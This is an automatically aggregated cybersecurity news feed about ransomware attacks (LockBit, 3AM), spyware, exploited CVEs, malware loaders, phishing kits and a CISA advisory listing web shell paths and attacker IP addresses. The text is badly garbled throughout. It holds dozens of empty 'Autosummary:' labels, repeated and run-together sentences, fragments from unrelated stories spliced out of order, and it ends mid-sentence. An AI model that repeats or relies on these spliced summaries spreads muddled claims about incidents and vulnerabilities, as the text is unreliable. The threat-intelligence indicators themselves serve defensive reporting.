Lockbit ransomware gang hit the Carthage Area Hospital and the Clayton-Hepburn Medical Center in New York Pierluigi Paganini September 14, 2023 September 14, 2023 LockBit ransomware group breached two hospitals, the Carthage Area Hospital and the Clayton-Hepburn Medical Center in New York. Affiliates of the Lockbit gang have also hit other healthcare organizations in the past, in early December 2022, the Hospital Centre of Versailles was hit by a cyber attack that was attributed to the group. "UK Greater Manchester Police (GMP) disclosed a data breach, threat actors had access to some of its employees’ personal information. UK Greater Manchester Police (GMP) announced that threat actors had access to the personal information of some of its employees after an unnamed third-party supplier was hit with a ransomware attack. The GMP reported that […]
The post UK Greater Manchester Police disclosed a data breach appeared first on Security Affairs.
"Autosummary:
"The iPhone of a prominent Russian journalist, who is at odds with Moscow, was infected with NSO Group’s Pegasus spyware. The iPhone of the Russian journalist Galina Timchenko was compromised with NSO Group’s Pegasus spyware. A joint investigation conducted by Access Now and the Citizen Lab revealed that the journalist, who is at odds with the Russian government, […]
The post The iPhone of a Russian journalist was infected with the Pegasus spyware appeared first on Security Affairs.
"Autosummary:
“Sophisticated spyware like Pegasus, which bypasses encryption and takes full control of the victim’s phone, including access to photos, messages, and contacts, as well as the phone’s camera and microphone, represents an existential threat to journalists and media freedom globally.” "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
According to Symantec’s malware analysis, the 3AM Rust-based 64-bit executable recognizes the following command-line parameters: "-k" - 32 Base64 characters, the "access key" in the ransom note "-p" - unknown "-h" - unknown "-m" - method, where the code checks one of two values before running encryption logic: "local" "net" "-s" - determines offsets within files for encryption to control encryption speed, expressed as decimal digits. “The attacker also executed various Cobalt Strike components and tried to escalate privileges on the computer using PsExec” - Symantec Threat Hunter Team The researchers observed the use of commands commonly used for reconnaissance (e.g. whoami, netstat, quser, and net share), enumerating servers (e.g. quser, net view), adding a new user for persistence, and the use of the old wput FTP client to copy files to the attacker’s server. "Autosummary:
Unusual sending times Out of the ordinary requests Spoofed display names (slightly altered to appear legitimate at a glance e.g. Miicrosoft) Low quality images Catching the clever parts There are also more subtle tactics that are more likely to be employed in targeted, planned phishing attacks such as spear phishing, CEO fraud, executive impersonation, supply chain compromise, or business email compromise. Image source: MindTools The key limitation training is that even if SAT is delivered with regular reinforcement, accidents still happen, especially when end-users are under pressure to make decisions quickly in their day-to-day jobs. Spotting the obvious stuff SAT helps individuals spot the telltale signs of phishing attacks by helping users "practice" seeing them in real-world, controlled environments. It can enforce compliance requirements, block over 3 billion unique passwords, and help users create stronger passwords with dynamic, informative client feedback. Training end-users to spot phishing has its benefits, but it’s clear to see organizations as a whole have failed to make a dent in phishing attacks. "Autosummary:
"Categories: Business Categories: Exploits and vulnerabilities Categories: News Tags: Microsoft Tags: Adobe Tags: Android Tags: Apple Tags: Chrome Tags: SAP Tags: Exchange Tags: Visual Studio Tags: CVE-2023-36761 Tags: CVE-2023-36802 Tags: CVE-2023-29332 Tags: Azure Microsoft"s September 2023 Patch Tuesday is another important one. It patches two vulnerabilities which are known to be actively exploited. |
The post Patch now! September Microsoft Patch Tuesday includes two actively exploited zero-days appeared first on Malwarebytes Labs.
"Autosummary:
A critical vulnerability which can be expected to have some impact is: CVE-2023-29332 (CVSS score 7.5 out of 10): a Microsoft Azure Kubernetes Service Elevation of Privilege (EoP) vulnerability. The Cybersecurity & Infrastructure Security Agency (CISA) has added these two vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. "Autosummary:
"These weaknesses collectively allow an attacker to inject and execute malicious scripts when the stored data is retrieved and displayed to users," Ben Shitrit noted, urging organizations to implement adequate input validation and output encoding to "ensure that user-generated data is properly sanitized before being displayed in web pages." "Autosummary:
"We"ve seen no evidence ourselves to suggest that this affiliate has used 3AM again, but we"re not surprised to see other reports of 3AM"s use," Dick O"Brien, principal intelligence analyst at Symantec, told The Hacker News. "Autosummary:
The Cyber Invasion of Ukraine On August 31, 2023, Five Eyes Agency — an intelligence alliance network composed of agencies from Australia, Canada, New Zealand, the United Kingdom, and the United States — issued a new report revealing that Russian state-sponsored hackers were using the infamous Chisel malware to target the Android devices of Ukrainian military personnel to collect and extract data.The list of countries that have accused China of cyberwarfare is lengthy and includes Australia, Canada, India, Japan, Taiwan, the Vatican, and the US." A New Digital World Order As complex as cyberwarfare can be, and as significant as its impacts are, the unfortunate truth is that for governments that are rich in resources, cyberwarfare is an increasingly easy-to-access weapon that they can leverage for their own interests. As Beijing"s geopolitical interest in Taiwan and the South China Sea increases, along with a display of military force, cyberattacks that include espionage, cyber theft, and the unethical transfer of technologies and knowledge are expected to escalate. "Autosummary:
This includes a mix of downloaders, banking trojans, ransomware, and modular toolkits such as Nymaim, Gozi, TrickBot, IcedID, Gootkit, Dridex, Sage, GandCrab, and JSSLoader. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
In some phishing attacks, scammers send a huge number of messages that are often connected to current events and abuse, for example, community activism, such as when Reddit users who intend to gather for a protest may suddenly receive a fake link for the event. To recognize phishing, read the whole message carefully, look for grammar mistakes, check the sender, and pay attention to links and unexpected attachments.They reach out privately to struggling users who have recently made requests and promise help, ask users for their banking information, or offer a check that ultimately will be returned—leaving the requester’s account in the negative,” reads a post in the r/Assistance subreddit. Spam and upvoting rings Spamming is a serious issue on Reddit, one that is exacerbated by well-organized groups that abuse the site’s voting system, create fabricated and possibly harmful content and then promote it on Reddit with the help of fake accounts. "Autosummary:
This group includes Windows computers that perform one or several of the following functions: Supervisory control and data acquisition (SCADA) servers Data storage servers (Historian) Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human Machine Interface (HMI) Computers used for industrial network administration Computers used to develop software for industrial automation systems For the purposes of this report, “attacked computers” are those on which Kaspersky security solutions blocked one or more threats during the period in review (in the diagrams above, this can be a month, half-year or year, depending on the context). Categories of malicious objects Malicious scripts and phishing pages were blocked on 12.7% of ICS computers Denylisted internet resources, on 11.3% Spyware, on 6% Malicious documents, on 4% Ransomware, on 0.32%. Ten countries and territories with the lowest percentage of ICS computers on which malicious objects were blocked, H1 2023 Individual industries In H1 2023, the percentage of ICS computers on which malicious objects were blocked increased in engineering and ICS integration (by 2 pp), manufacture (by 1.9 pp) and energy (by 1.5 pp). Email clients – 6% Removable devices – 3.4% Good news H1 2022 saw a noticeable increase in the percentage of ICS computers on which the following threats were blocked: Spyware Malicious documents Malicious miners in the form of Windows executables Ransomware That was the bad news. Regions ranked by percentage of ICS computers on which threats from the internet were blocked, H1 2023 The largest increase in the percentage of ICS computers on which internet threats were blocked in the first half of 2023 was recorded in the regions that were historically the safest: Western Europe (by 2.6 pp), the United States and Canada (by 2 pp), and Australia and New Zealand (by 1.4 pp). H1 2023 changes in the percentages of ICS computers on which denylisted internet resources were blocked, by region H1 2023 changes in the percentages of ICS computers on which malicious scripts and phishing pages were blocked, by region Both threat types spread via the internet, while malicious scripts and phishing pages also spread via email. Percentage of ICS computers on which malicious objects were blocked, by regions You may remember that in the previous half-year, the percentage of ICS computers in Russia and Central Asia on which malicious objects were blocked increased noticeably due to mass infection of websites, including those run by industrial companies, that used an outdated version of a popular Russian CMS. Percentage of ICS computers on which malicious objects from various sources were blocked The percentage of ICS computers on which network folder threats were blocked As is the case with the overall threat statistics, the percentage of ICS computers on which malicious objects from various sources were blocked varies by region and country. Fifteen countries and territories with the highest percentage of ICS computers on which internet threats were blocked, H1 2023 Email clients Since the first half of 2022, Southern Europe has remained the region with the highest percentage of ICS computers on which malicious email attachments and phishing links were blocked. Percentage of ICS computers on which malicious objects were blocked, by half year That said, the percentage of attacked ICS computers dropped in Q1 2023, but then rose again in Q2 2023, reaching highest quarterly figure since 2022. "Autosummary:
"Autosummary:
To do this, look for the following files dropped by the malware, and if found, delete them: /etc/cron.d/collect /var/tmp/crond /var/tmp/bs Despite the age of the malicious tools used in these attacks, the signs of suspicious activity on infected computers, and multiple social media reports, the malicious Debian package remained undetected for years. "Autosummary:
"Autosummary:
Disk image file (SentinelOne) SentinelOne has observed DMGs named after Adobe software or client work, including the following: Advertising terms of reference (MacOS presentation).dmg CONCEPT A3 full menu with dishes and translations to English.dmg AnimatedPoster.dmg Brief_Presentation-Task_Overview-(SOW)-PlayersClub.dmg AdobeOfficialBriefDescription.dmg Adobe Photoshop 2023 (with AI) installer.dmg The malware"s application bundles contain the bare essentials, namely an Info.plist file, a Resources folder with an icon image, and a macOS folder with the malicious Mach-O executable. "Autosummary:
" Nevertheless, the issue was also exploited by APT29, the Russian Foreign Intelligence Service (SVR) hacking division, in attacks against dozens of organizations, including government agencies worldwide. "Autosummary:
"Autosummary:
"Autosummary:
Mozilla addressed the exploited zero-day in Firefox 117.0.1, Firefox ESR 115.2.1, Firefox ESR 102.15.1, Thunderbird 102.15.1, and Thunderbird 115.2.2. "Categories: Threat Intelligence Ransomware news in August was highlighted by the sudden fall of CL0P from the list of the monthly most active gangs, while Lockbit returned to the number one spot. |
The post Ransomware review: September 2023 appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks by gang, August 2023 Known ransomware attacks by country, August 2023 Known ransomware attacks by industry sector, August 2023 We speculated on reasons for the downward trend in last month’s review, such as it being possibly related to a recent affiliate arrest, but interesting research published last month may also hold the clue to other answers.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.Posted: September 12, 2023 by Ransomware news in August was highlighted by the sudden fall of CL0P from the list of the monthly most active gangs, while Lockbit returned to the number one spot. This article is based on research by Marcelo Rivero, Malwarebytes" ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. "Categories: Exploits and vulnerabilities Categories: News Tags: Google Tags: Chrome Tags: CVE-2023-4863 Tags: WebP Tags: buffer overflow Tags: 116.0.5845.187/.188 Chrome users are being urged to patch a critical vulnerability for which an exploit is available. |
The post Update Chrome now! Google patches critical vulnerability being exploited in the wild appeared first on Malwarebytes Labs.
"Autosummary:
The zero-day patched in this update is listed as: CVE-2023-4863: a heap buffer overflow in WebP, also described as a vulnerability that resides in the WebP image format which could lead to arbitrary code execution or a crash. "Categories: Business Categories: News Tags: Microsoft Teams Tags: DarkGate Tags: Loader Tags: Trojan Tags: Sharepoint Tags: AutoIt Researchers have found a new distribution method for the DarkGate Loader which circumvents the security features in Microsoft Teams. |
The post Microsoft Teams used to deliver DarkGate Loader malware appeared first on Malwarebytes Labs.
"Autosummary:
Once active, the malware can be used for several malicious activities like remote access, cryptocurrency mining, keylogging, clipboard stealing, and information stealing. When the shellcode is run, the first thing it uses is the “byte by byte” technique aka called stacked strings, to create a new file: a Windows executable identified as DarkGate Loader. "Categories: Exploits and vulnerabilities Categories: News Tags: Blastpass Tags: citizenlab Tags: pegasus Tags: nso Tags: cisa Tags: apple Tags: cve-2023-41064 Tags: cve-2023-41061 Tags: buffer overflow CISA has added two recently discovered Apple vulnerabilities to its catalog of known exploited vulnerabilities. |
The post Two Apple issues added by CISA to its catalog of known exploited vulnerabilities appeared first on Malwarebytes Labs.
"Autosummary:
The Cybersecurity & Infrastructure Security Agency (CISA) has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.If a Safari update is available for your device, you can get it by updating or upgrading macOS, iOS, or iPadOS. "Categories: News Categories: Personal Tags: MGM resorts Tags: hotel Tags: casino Tags: attack Tags: cyber Tags: shutdown MGM resorts has suffered a major cyberattack leading to shutdowns across the US. |
The post Major cyberattack leaves MGM Resorts reeling appeared first on Malwarebytes Labs.
"Autosummary:
Source: https://t.co/etNWW0S49y pic.twitter.com/ZgYkv1fD58 — Joe Tidy (@joetidy) September 12, 2023 Some systems are slowly coming back to life, but there’s no estimate for when full functionality will be restored.Meanwhile, BBC reporter Joe Tidy reports that slot machines and casino floors were left empty, and that physical room keys had to be distributed. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
C2 Commands: Commands like "downloadexecute," "uninstall," "update," and "load," present in OriginBotnet, are not found in OriginLogger. "Autosummary:
"This specific targeting of business users is somewhat unusual for macOS malware, which is more commonly found being distributed via torrent sites or suspicious third-party software distributors as cracked versions of business, productivity or other popular software," Stokes said. "Autosummary:
"Autosummary:
"Autosummary:
The campaign identified by ESET researchers spanned between March 2021 and June 2022, targeting government and healthcare orgs and firms engaged in financial services, engineering, manufacturing, technology, law, telecommunications, and more. "Autosummary:
"The outage impacted an important part of our infrastructure, known as a Domain Name System, or DNS," the company said today. "Autosummary:
The researchers report roughly 100,000 phishing messages per week, sent mainly to Facebook users in North America, Europe, Australia, Japan, and Southeast Asia. "Autosummary:
Citizen Lab security researchers have often found and disclosed zero-day bugs abused in highly-targeted spyware attacks by government-backed threat actors targeting high-risk individuals such as opposition politicians, journalists, and dissidents worldwide. "Autosummary:
The company confirmed the breach in 2020, after an archive with stolen data - including guests" names, dates of birth, email addresses, phone numbers, and physical addresses, was shared freely on a hacker forum. "Categories: News Categories: Ransomware Tags: ransomware Tags: reinfection Tags: stolen credentials Tags: vulnerabilities Tags: infected backups Tags: logging Tags: forensic investigation Tags: backdoors The main causes for getting reinfected with ransomware can be prevented by performing a forensic analysis. |
The post The main causes of ransomware reinfection appeared first on Malwarebytes Labs.
"Autosummary:
The most common reasons for reinfection are: backdoors left behind by the criminals credentials stolen in the course of the first attack unpatched vulnerabilities restoration of infected backups In some ransomware attacks criminals have access to the target network for weeks or months, giving them ample opportunity to open a backdoor or otherwise retain the necessary controls and permissions to return and trigger another attack. Not only does a thorough forensic investigation help you find the cause that might be remediated, it’s important to be able to follow the tracks the attacker left in your network, so you can reconstruct what access they may have gained and what they may have copied, left behind, changed, or deleted.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Autosummary:
"On December 12th, 2021, the reverse shell dropped a batch file, install.bat, and within minutes of executing the batch file, Ballistic Bobcat operators pushed their newest backdoor, Sponsor." "Autosummary:
"Autosummary:
"When the stealer is executed, it runs its main function that steals cookies and credentials from several Chromium-based web browsers, then exfiltrates the data to the C&C server and to the Telegram bot," security researcher Jaromir Horejsi said. "Even though HijackLoader does not contain advanced features, it is capable of using a variety of modules for code injection and execution since it uses a modular architecture, a feature that most loaders do not have," Zscaler ThreatLabz researcher Nikolaos Pantazopoulos said. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
It is a potent malware that supports a wide range of malicious activities, including hVNC for remote access, cryptocurrency mining, reverse shell, keylogging, clipboard stealing, and information stealing (files, browser data). "Autosummary:
Cisco"s analysis of the DNS request data sent to the attacker"s infrastructure shows that the victimology footprint spans France and Switzerland, followed by sporadic infections in the U.S., Canada, Algeria, Sweden, Germany, Tunisia, Madagascar, Singapore, and Vietnam. "Autosummary:
Vulnerability details The CVE-2023-20269 flaw is located within the web services interface of the Cisco ASA and Cisco FTD devices, specifically the functions that deal with authentication, authorization, and accounting (AAA) functions. "Autosummary:
The investigation carried out by Dymocks and contracted experts has so far confirmed that the following types of customer information have been compromised: Full name Date of birth Email address Postal address Gender Membership details (gold expiry date, account status, account creation date, card ranking) "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @VK_Intel, @jorntvdw, @LawrenceAbrams, @PolarToffee, @FourOctets, @struppigel, @DanielGallagher, @malwareforme, @Ionut_Ilascu, @demonslay335, @billtoulas, @serghei, @fwosar, @malwrhunterteam, @Seifreed, @cloudsek, @SecurityAura, @SentinelOne, and @pcrisk. "Autosummary:
The updates are available for the following devices and operating systems - iOS 16.6.1 and iPadOS 16.6.1 - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later macOS "Autosummary:
" The issue, per the company, impacts the two BroadWorks products and have one of the following apps enabled: AuthenticationService, BWCallCenter, BWReceptionist, CustomMediaFilesRetrieval, ModeratorClientApp, PublicECLQuery, PublicReporting, UCAPI, Xsi-Actions, Xsi-Events, Xsi-MMTel, or Xsi-VTR." Outside of Juniper Networks, FRRouting, and OpenBGPd, the flaw also affects other vendors like D-Link, EXOS (CVE-2023-40457), Red Hat, and Ubuntu. "Autosummary:
On a particular note, for security teams is that the vulnerabilities targeted in these attacks for the initial breach were commonly scanned for and high-profile vulnerabilities that included Log4Shell, a vulnerability in desktop VoIP solution 3CX, and a remote code execution vulnerability in the digital certificate solution MagicLine4NX.As is evidenced by Lazarus" attacks, common vulnerabilities in web applications hosted on Microsoft IIS can be leveraged by adversaries to compromise the server, gain unauthorized access, steal data, or launch further attacks.Since then, it has seen several iterations, improvements, and features added to align with the evolving Internet, including support for HTTPS (secure HTTP) requests. "Autosummary:
"North Korean cyber threat actors pursue cyber operations aiming to (1) collect intelligence on the activities of the state"s perceived adversaries: South Korea, the United States, and Japan, (2) collect intelligence on other countries" military capabilities to improve their own, and (3) collect cryptocurrency funds for the state," Microsoft said. "Autosummary:
"Nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network," according to a joint alert published by the agency, alongside Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF). "Autosummary:
"The cybersecurity skills crisis continues in a multi-year freefall that has impacted 71% of organizations and left two-thirds of cybersecurity professionals stating that the job has become more difficult over the past two years—while 60% of organizations continue to deflect responsibility, according to a new report from ESG and ISSA. A career in cybersecurity is becoming more difficult in an increasingly challenging environment 66% of respondents believe that working as a cybersecurity professional has become … More
The post Cybersecurity pros battle discontent amid skills shortage appeared first on Help Net Security.
"Autosummary:
The global cybersecurity skills shortage continues unabated 71% of organizations report that the cybersecurity skills shortage has impacted them—a dramatic increase from 57% in the last study, leading to an increased workload for the cybersecurity team (61%), unfilled open job requisitions (49%), and high burnout among staff (43%), according to respondents. "LibreOffice, the most widely used open-source office productivity suite, has plenty to recommend it: it’s feature-rich, user-friendly, well-documented, reliable, has an active community of developers working on improving it, and it’s free. The suite includes Writer (word processor), Calc (a spreadsheet app), Impress (a presentation app), Draw (graphics editor), Math (app for creating and editing mathematical formulas), and Base (database management software). Its development is shephered by The Document Foundation (TDF), a German non-profit organization … More
The post LibreOffice: Stability, security, and continued development appeared first on Help Net Security.
"Autosummary:
“This effort was coupled with the creation of an infrastructure to serve the developers, with the implementation of tools such as Gerrit for code review, Git for continuous integration, a battery of Tinderboxes, Bugzilla for quality assurance, OpenGrok for source code research, Weblate for localization, as well as testing for performance and crash analysis,” he explained.LibreOffice, the most widely used open-source office productivity suite, has plenty to recommend it: it’s feature-rich, user-friendly, well-documented, reliable, has an active community of developers working on improving it, and it’s free. “On the downstream side, open-source projects that integrate components developed by The Document Foundation, e.g., import filters for some proprietary formats (such as Microsoft Publisher and Visio, Apple Keynote, etc.), rely on the professionalism of LibreOffice developers. "Cybercriminals create hundreds of thousands of counterfeit domains that mimic well-known brands for financial gain. These fake domains serve multiple malicious purposes, such as sending phishing emails, hosting fraudulent websites, rerouting web traffic, and distributing malware. In this Help Net Security video, Eric George, Director of Solution Engineering at Fortra, discusses why brands should take domain impersonation threats seriously and how security teams can counteract this issue.
The post How cybercriminals use look-alike domains to impersonate brands appeared first on Help Net Security.
"Autosummary:
"A newer version of the Atomic Stealer macOS malware has a new trick that allows it to bypass the operating system’s Gatekeeper, Malwarebytes researchers have discovered. Mac malware delivered through Google ads The malware, which was first advertised in April 2023, is an infostealer that can grab passwords from browsers, Apple’s keychain, files, crypto wallets, and more. “Criminals who buy the toolkit have been distributing it mostly via cracked software downloads but are also impersonating … More
The post MacOS malware has a new trick up its sleeve appeared first on Help Net Security.
"Autosummary:
Mac malware delivered through Google ads The malware, which was first advertised in April 2023, is an infostealer that can grab passwords from browsers, Apple’s keychain, files, crypto wallets, and more. "Autosummary:
"Autosummary:
Unfortunately, the investigation that was concluded on August 2nd, 2023, showed that unauthorized users accessed the following CarePath user details: Full name Contact information Date of birth Health insurance information Medication information Medical condition information The exposure impacts CarePath users who enrolled on Janssen"s online services before July 2nd, 2023, which might indicate that the breach occurred on that date or the breached database was a backup. "Autosummary:
The US has previously sanctioned numerous individuals for their involvement in ransomware operations, including CryptoLocker, SamSam, WannaCry, Evil Corp, REvil, and BlackShadow/Pay2Key. Ultimately, these leaks led to the shutdown of the Conti ransomware operation, which has now splintered into numerous other ransomware operations, such as Royal, Black Basta, and ZEON. "Autosummary:
Phishing email (Check Point) Clicking on the URL leads victims to phishing pages that host a Google Slideshow promising cryptocurrency winnings, but on this step, the amount has been raised to 1.35 BTC ($34,700). "Autosummary:
North Korean defense targeting (Microsoft) Defense firms in Brazil, Czechia, Finland, Italy, Norway, and Poland have also been subject to these intrusions, all as part of a coordinated endeavor to enhance the country"s military capabilities. "Autosummary:
"Autosummary:
Attacker-controlled Twitter account (Google TAG) Under attack since at least January 2021 This campaign is similar to a previous one exposed in January 2021 that also used Twitter and other social media platforms like LinkedIn, Telegram, Discord, and Keybase as the initial contact vector, presumably orchestrated by the same actors. "Autosummary:
Although they display suspicious behavior, some of the executables [1, 2, 3, 4] dropped after exploiting RocketMQ are currently not detected as malicious by antivirus engines on the Virus Total scanning platform The samples’ dubious conduct on a system includes deleting themselves, running commands to modify permissions, enumerating processes, dumping credentials, reading the SSH private keys and the “known_hosts” file, encoding and encrypting data, and reading the bash history. "Autosummary:
"CISA, FBI, and CNMF confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network," reads the advisory. "Autosummary:
Enhanced Safe Browsing feature in Google Chrome settings Source: BleepingComputer This feature, though, comes with a tradeoff in privacy, as Google Chrome will now send URLs you open (including downloads) back to Google’s servers to check if they are malicious. "Autosummary:
"Categories: News Categories: Ransomware Tags: history Tags: ransomware Tags: bulletproof hosting Tags: cryptocurrency Tags: encryption Tags: fast internet Tags: government protection Tags: RaaS Tags: LockBit Tags: pentester tools Tags: code We tell you about the origin of ransomware and what factors contributed to making it the most feared type of malware. |
The post A history of ransomware: How did it get this far? appeared first on Malwarebytes Labs.
"Autosummary:
Here are a few ways: No more snail mail and floppy disks These days, popular delivery methods for ransomware are malspam, malvertising, and vulnerabilities in popular software or networking devices.Penetration testing, or pen testing, is the practice of running controlled attacks on a computer system, network, software, or other application in an attempt to find unpatched vulnerabilities or flaws.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Ransomware as a service The ransomware as a service (RaaS) model—where ransomware gangs “rent out” their technology on a subscription basis to other groups—makes it possible to scale operations and divide the workload in an effective way. "Autosummary:
The men - 38-year-old Abel Valdes, 41-year-old Yordanesz Sanchez, and 33-year-old Carlos Jordano Herrera-Ruiz - were arrested on August 3 in a hotel room, where a number of Raspberry Pis and other evidence was recovered. "Autosummary:
The macOS payload ("TradingView.dmg") is a new version of Atomic Stealer released at the end of June, which is bundled in an ad-hoc signed app that, once executed, prompts users to enter their password on a fake prompt and harvest files as well as data stored in iCloud Keychain and web browsers. "Autosummary:
Figure 3: Top challenges for MSPs/MSSPs in providing vCISO services Hiring Cybersecurity Experts is a Key Blocker to Offering vCISO Services 91%, nearly all, respondents believe that offering vCISO services requires the expansion of their cybersecurity team. Figure 2: Top Benefits of adding vCISO services to the MSP/MSSP offering The Challenging Path to vCISO Services Yet, the road to vCISO success is not without obstacles, as can be seen in figure 3. "Among organizations that have suffered data breaches 58% were caused by issues related to digital certificates, according to a report by AppViewX and Forrester Consulting. As a result of service outages, 57% said their organizations have incurred costs upwards of $100,000 per outage. According to the Forrester study, “Enterprise organizations have traditionally been less focused on managing machine identities compared to human ones, partly because they have different requirements and more complicated lifecycle and security … More
The post Avoidable digital certificate issues fuel data breaches appeared first on Help Net Security.
"Autosummary:
"Autosummary:
For this to happen, W3LL Panel needs to go through several steps, which include: Pass CAPTCHA verification Set up the correct fake login page Validate the victim"s account Obtain the target organization’s brand identity Get the cookies for the login process Identify the type of account Validate the password Obtain the one-time-passcode (OTP) Get an authenticated session cookie After the W3LL Panel gets the authentication session cookie, the account is compromised and the victim is shown a PDF document, to make the login request appear legitimate. “W3LL’s major weapon, W3LL Panel, may be considered one of the most advanced phishing kits in class, featuring adversary-in-the-middle functionality, API, source code protection, and other unique capabilities” - Group-IB W3LL arsenal for BEC attacks Apart from W3LL Panel, which was designed to bypass multi-factor authentication (MFA), the actor provides 16 more tools, all primed for BEC attacks. "Autosummary:
The phishing infrastructure is estimated to have targeted more than 56,000 corporate Microsoft 365 accounts and compromised at least 8,000 of them, primarily in the U.S., the U.K., Australia, Germany, Canada, France, the Netherlands, Switzerland, and Italy between October 2022 and July 2023, netting its operators $500,000 in illicit profits. "Autosummary:
"Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file "weblinks.cmd" to the victim"s computer," CERT-UA said, attributing it to the Russian threat actor known as APT28 (aka BlueDelta, Fancy Bear, Forest Blizzard, or FROZENLAKE). "A cyberattack campaign is targeting exposed Microsoft SQL (MS SQL) databases, aiming to deliver ransomware and Cobalt Strike payloads. The attack campaign The attackers target exposed MS SQL servers by brute-forcing access credentials. After having successfully authenticated, they start enumerating the database. A (too often) enabled xp_cmdshell function also allows attackers to run shell commands on the host and launch several payloads. Attackers then: Create new users on the victim host Make registry changes to … More
The post Cybercriminals target MS SQL servers to deliver ransomware appeared first on Help Net Security.
"Autosummary:
MS SQL servers under attack Trustwave has recently deployed honeypot servers mimicking nine popular database systems – MS SQL Server, MySQL, Redis, MongoDB, PostgreSQL, Oracle DB, IBM DB2, Cassandra, and Couchbase – in key regions of the world, and quickly discovered that attack activity on MS SQL honeypots accounted for 93% of the total. "Autosummary:
"Autosummary:
APT34, also known by the names Cobalt Gypsy, Hazel Sandstorm (formerly Europium), Helix Kitten, and OilRig, has a track record of targeting telecommunications, government, defense, oil and financial services verticals in the Middle East since at least 2014 via spear-phishing lures that culminate in the deployment of various backdoors. "Autosummary:
"Autosummary:
Two security patch levels As usual, Google issued two sets of patches for September 2023, tagged as the 2023-09-01 and 2023-09-05 security patch levels. "Autosummary:
Wazuh is a free and open source security monitoring solution that provides unified XDR and SIEM capabilities for incident response, threat detection, file integrity monitoring, and compliance management. SMEs can easily extend their security capabilities by integrating Wazuh with other security technologies, such as security orchestrators, threat intelligence feeds, and incident management platforms. Enhanced threat detection and simplified incident response As a comprehensive SIEM and XDR solution, Wazuh provides advanced threat detection capabilities that empower organizations to monitor, detect and respond to potential threats to endpoints and data. "Autosummary:
"Everyone on the Ann Arbor, Flint, Dearborn, and Michigan Medicine campuses must change their passwords by Tuesday, September 12," the university"s ITS Service Center (ITS) also warns. "The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application. Additional APT actors were also observed exploiting CVE-2022-42475 to establish presence on the organization’s firewall device.
CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Autosummary: c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\resource.aspx c:\inetpub\wwwroot\uninet\css\font-awesome\css\discover.ashx c:\inetpub\wwwroot\uninet\css\font-awesome\css\configlogin.ashx c:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\template\layouts\approveinfo.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\errorinfo.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.ashx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\error.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\infos.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info-1.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us ew_list.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\errorinfo.aspx c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\lgnbotr.ashx c:\inetpub\passwordchange\0LECPNJYRH.aspx c:\inetpub\passwordchange\9ehj.aspx c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\servicesinfo.ashx c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\services.aspx c:\inetpub\redirectedSites\[REDACTED]\products\uns1fw.aspx c:\inetpub\redirectedSites\[REDACTED]\products\uns1ew.aspx The following IP addresses were identified as associated with the loaded web shells: 45.90.123[.]194 154.6.91[.]26 154.6.93[.]22 154.6.93[.]5 154.6.93[.]12 154.6.93[.]32 154.6.93[.]24 184.170.241[.]27 191.96.106[.]40 102.129.145[.]232 Forensic Timeline of APT Actor Activity Tables 1 and 2 list the timeline of events discovered during the incident response, as well as tools used by the APT actors to conduct their operations, respectively.quser.exe A valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server [T1049], including the name of the user, name of the session on the remote desktop session host server, session ID, state of the session (active or disconnected), idle time (number of minutes since last keystroke or mouse movement), and date/time the user logged on.[8] APT actors were observed using this tool as early as March 2023 across four locations with the same name but different hashes (one of which is associated with the Portuguese [Brazil] language pack): c:\ProgramFiles\WindowsApps\Microsoft.Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply 